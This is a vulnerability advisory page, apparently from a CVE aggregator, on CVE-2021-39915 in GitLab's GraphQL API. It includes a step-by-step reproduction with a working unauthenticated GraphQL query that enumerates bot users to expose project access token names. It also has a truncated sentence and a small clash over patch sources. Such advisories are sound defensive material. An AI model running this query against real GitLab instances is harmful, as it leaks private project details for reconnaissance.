CVE-2021-39915
Description
Improper access control in the GraphQL API in GitLab CE/EE affecting all versions starting from 13.0 before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2, allows an attacker to see the names of project access tokens on arbitrary projects
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Improper access control in GitLab GraphQL API allows unauthenticated attackers to enumerate project access token names, revealing sensitive project information.
Vulnerability
An improper access control vulnerability in the GraphQL API of GitLab CE/EE, affecting versions from 13.0 before 14.3.6, 14.4 before 14.4.4, and 14.5 before 14.5.2, allows unauthenticated users to retrieve the names of project access tokens. The issue arises because the API does not enforce proper authorization checks when returning token names, which are inadvertently exposed via the underlying bot user profile information [1].
Exploitation
An attacker with no authentication can query the GitLab GraphQL API to enumerate bot users (e.g., by searching for _bot in usernames) and retrieve the names of project access tokens. These token names are often descriptive and may leak information about the project, such as member names, project name, company name, build tools, or even the token value if included in the name [1]. The attack requires no special privileges or user interaction.
Impact
Successful exploitation allows an attacker to see the names of project access tokens on arbitrary projects, potentially revealing sensitive information about private projects. Although the token value itself is not directly exposed, the token name can lead to further enumeration and may disclose project details, membership, or inadvertently embedded secrets [1]. This compromises confidentiality and aids in reconnaissance for targeted attacks.
Mitigation
GitLab addressed this vulnerability in versions 14.3.6, 14.4.4, and 14.5.2, released on 2021-12-13. Users should upgrade to these patched versions immediately. No workarounds are available for earlier versions. The issue is not listed in CISA KEV as a known exploited vulnerability [1].
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
3- Range: >=13.0, <14.3.6, >=14.4, <14.4.4, >=14.5, <14.5.2
- Range: >=13.0, <14.3.6
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"The GraphQL users endpoint does not require authentication and returns the user-chosen name of bot users, leaking project access token names from private projects."
Attack vector
An unauthenticated attacker sends a GraphQL query to `/-/graphql-explorer` searching for users with `_bot` in the username [ref_id=1]. The API returns the `name` and `username` of every matching bot user, which reveals the project access token name chosen by the project owner. Because bot usernames follow the pattern `project_
Affected code
The GraphQL API endpoint at `/api/graphql` (accessible via `/-/graphql-explorer`) exposes the `users` query with a `search` argument. The underlying resolver returns bot users created for project access tokens, including their `name` field, without requiring authentication [ref_id=1].
What the fix does
The advisory does not include a published patch diff. The expected remediation is to either give bot users generic names (hiding the user-chosen token name) or to prevent bot users from being listed via the public GraphQL API [ref_id=1]. No fix commit is present in the bundle.
Preconditions
- authNo authentication required; the attacker can be unauthenticated
- configThe target project must have created at least one project access token (premium feature on GitLab.com)
- networkAttacker needs network access to the GitLab instance's GraphQL endpoint
Reproduction
1. Log out of gitlab.com (this works unauthenticated). 2. Go to `https://gitlab.com/-/graphql-explorer`. 3. Execute the query: ```graphql { users(search: "_bot") { nodes { username name } } } ``` 4. Observe that the response includes the names of project access tokens from private projects [ref_id=1].
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
3- gitlab.com/gitlab-org/cves/-/blob/master/2021/CVE-2021-39915.jsonmitrex_refsource_CONFIRM
- gitlab.com/gitlab-org/gitlab/-/issues/340803mitrex_refsource_MISC
- hackerone.com/reports/1336059mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.